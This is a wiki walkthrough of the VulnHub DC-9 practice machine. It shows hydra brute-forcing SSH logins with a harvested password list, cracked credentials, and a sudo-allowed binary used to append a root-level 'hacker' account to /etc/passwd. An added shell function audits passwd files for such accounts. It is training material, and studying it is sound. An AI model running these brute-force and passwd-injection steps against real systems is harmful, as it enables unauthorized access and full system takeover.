Vulnhub dc-9: Log in and look around

From Xinux Wiki

Log in

  • ssh janitor@10.0.10.58
janitor@10.0.10.58's password: 
Linux dc-9 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u2 (2019-11-11) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Mar  9 19:57:31 2023 from 10.0.10.101
  • ls -la
total 16
drwx------  4 janitor janitor 4096 Mar  9 19:57 .
drwxr-xr-x 19 root    root    4096 Dec 29  2019 ..
lrwxrwxrwx  1 janitor janitor    9 Dec 29  2019 .bash_history -> /dev/null
drwx------  3 janitor janitor 4096 Mar  9 19:57 .gnupg
drwx------  2 janitor janitor 4096 Dec 29  2019 .secrets-for-putin

What is in this directory?

  • cat .secrets-for-putin/passwords-found-on-post-it-notes.txt

BamBam01
Passw0rd
smellycats
P0Lic#10-4
B4-Tru3-001
4uGU5T-NiGHts

We extend our pass.txt

password
3kfs86sfd
468sfdfsd2
4sfd87sfd1
RocksOff
TC&TheBoyz
B8m#48sd
Pebbles
BamBam01
UrAG0D!
Passw0rd
yN72#dsd
ILoveRachel
3248dsds7s
smellycats
YR3BVxxxw87
Ilovepeepee
Hawaii-Five-0
BamBam01
Passw0rd
smellycats
P0Lic#10-4
B4-Tru3-001
4uGU5T-NiGHts

Test again

  • hydra -L users.txt -P pass.txt 10.0.10.58 ssh
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-03-09 11:23:03
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 551 login tries (l:19/p:29), ~35 tries per task
[DATA] attacking ssh://10.0.10.58:22/
[22][ssh] host: 10.0.10.58   login: fredf   password: B4-Tru3-001
[22][ssh] host: 10.0.10.58   login: chandlerb   password: UrAG0D!
[22][ssh] host: 10.0.10.58   login: joeyt   password: Passw0rd
[22][ssh] host: 10.0.10.58   login: janitor   password: Ilovepeepee
1 of 1 target successfully completed, 4 valid passwords found
[WARNING] Writing restore file because 2 final worker threads did not complete until end.
[ERROR] 2 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-03-09 11:24:56

We become fredf

janitor@dc-9:~$ su - fredf
Password: 
fredf@dc-9:~$ 
fredf@dc-9:~$

May fredf run a program as root?

  • sudo -l
Matching Defaults entries for fredf on dc-9:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin 

User fredf may run the following commands on dc-9:
    (root) NOPASSWD: /opt/devstuff/dist/test/test

We generate a hacker user

  • echo hacker:$(openssl passwd -1 -salt salz 12345678):0:0::/root:/bin/bash > hacker.account
  • sudo /opt/devstuff/dist/test/test hacker.account /etc/passwd
  • tail -n 1 /etc/passwd
hacker:$1$salz$MXi.F00pwv2Vq8c1XSZk/1:0:0::/root:/bin/bash
  • su - hacker
  • id
uid=0(root) gid=0(root) groups=0(root)
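
A defender-side check for the result of the step above, as an added example that is not part of the original wiki page: the shell function flags UID 0 accounts other than root and password hashes stored directly in a passwd file. The function names and the sample entries for daemon and fredf are assumptions made for the illustration.

```shell
#!/bin/sh
# Added example (not from the original page): audit a passwd(5)-format file
# for the traces that the appended "hacker" line leaves behind.

# audit_passwd [FILE]  (reads stdin when FILE is omitted)
# Prints one finding per line as "<reason>:<account>".
# Returns 0 when the file is clean, 1 when there is at least one finding.
audit_passwd() {
    awk -F: '
        /^[ \t]*$/ || /^#/ { next }                 # skip blanks and comments
        NF != 7 { print "malformed:" $1; bad = 1; next }
        # UID 0 on any account other than root is a second root account
        $3 ~ /^0+$/ && $1 != "root" { print "uid0:" $1; bad = 1 }
        # With shadow passwords field 2 is "x" (or "*" / "!" when locked).
        # A crypt(3) hash stored here is accepted at login instead.
        $2 ~ /^\$/ { print "inline-hash:" $1; bad = 1 }
        # An empty field 2 means no password is set for the account
        $2 == "" { print "empty-password:" $1; bad = 1 }
        END { exit bad + 0 }
    ' "$@"
}

# Constructed sample: UIDs and the fredf entry are made up for illustration;
# the last line is the entry shown in the tail output on this page.
sample_passwd() {
    cat <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
fredf:x:1003:1003::/home/fredf:/bin/bash
hacker:$1$salz$MXi.F00pwv2Vq8c1XSZk/1:0:0::/root:/bin/bash
EOF
}

# Demo run on the sample; on a real host call: audit_passwd /etc/passwd
sample_passwd | audit_passwd || echo "findings above need review"
```

On the sample the function reports `uid0:hacker` and `inline-hash:hacker`; the regular root entry is not flagged.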

Which kernel version is running?

  • uname -a
Linux dc-9 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u2 (2019-11-11) x86_64 GNU/Linux